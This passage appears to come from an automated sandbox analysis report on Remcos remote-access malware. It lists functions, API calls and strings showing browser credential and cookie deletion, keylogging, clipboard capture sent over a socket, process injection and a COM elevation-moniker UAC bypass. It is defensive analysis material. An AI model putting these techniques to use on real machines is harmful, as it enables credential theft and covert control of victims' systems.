                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                        • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                        • API String ID: 65172268-860466531
                                                                                                        • Opcode ID: a717337548b7bc67ef5be46030ec01eef617e46586cf903e586267f0ffb0d611
                                                                                                        • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                        • Opcode Fuzzy Hash: a717337548b7bc67ef5be46030ec01eef617e46586cf903e586267f0ffb0d611
                                                                                                        • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                        Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                        • Opcode ID: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                                        • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                        • Opcode Fuzzy Hash: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                                        • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                        Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                        • API String ID: 3527384056-432212279
                                                                                                        • Opcode ID: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                        • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                        • Opcode Fuzzy Hash: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                        • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                        Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                        • API String ID: 726551946-3025026198
                                                                                                        • Opcode ID: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                        • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                        • Opcode Fuzzy Hash: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                        • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                        Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32 ref: 004159C7
                                                                                                        • EmptyClipboard.USER32 ref: 004159D5
                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3520204547-0
                                                                                                        • Opcode ID: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                        • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                        • Opcode Fuzzy Hash: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                        • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                        Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                                                        • API String ID: 0-3177665633
                                                                                                        • Opcode ID: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                        • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                        • Opcode Fuzzy Hash: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                        • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                        Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                        • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                        • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                        • String ID: 8[G
                                                                                                        • API String ID: 1888522110-1691237782
                                                                                                        • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                        • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                        • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                        • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                        Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00406788
                                                                                                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object_wcslen
                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                        • API String ID: 240030777-3166923314
                                                                                                        • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                        • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                        • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                        • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                        Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                        • GetLastError.KERNEL32 ref: 00419935
                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3587775597-0
                                                                                                        • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                        • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                        • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                        • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                        Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                        • String ID: <D$<D$<D
                                                                                                        • API String ID: 745075371-3495170934
                                                                                                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                        • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                        • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                        Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 2341273852-0
                                                                                                        • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                        • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                        • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                        • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                        Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                                        • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                        • API String ID: 341183262-3780268858
                                                                                                        • Opcode ID: 1d006b57ec8407d67f410f90ba5cffff3744a2d4bd6339dc38e1b966420dba2d
                                                                                                        • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                        • Opcode Fuzzy Hash: 1d006b57ec8407d67f410f90ba5cffff3744a2d4bd6339dc38e1b966420dba2d
                                                                                                        • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                        Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                        • API String ID: 2127411465-314212984
                                                                                                        • Opcode ID: 6a6134eaba03f115680d8d2eb42cf80636db46aabc3f1259ea9bdfec89823a6a
                                                                                                        • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                        • Opcode Fuzzy Hash: 6a6134eaba03f115680d8d2eb42cf80636db46aabc3f1259ea9bdfec89823a6a
                                                                                                        • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                        Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                        • GetLastError.KERNEL32 ref: 0040B261
                                                                                                        Strings
                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                        • UserProfile, xrefs: 0040B227
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                        • Opcode ID: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                        • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                        • Opcode Fuzzy Hash: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                        • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                        Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                        • GetLastError.KERNEL32 ref: 00416B02
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                        Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 4043647387-0
                                                                                                        • Opcode ID: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                        • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                        • Opcode Fuzzy Hash: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                        • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                        Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
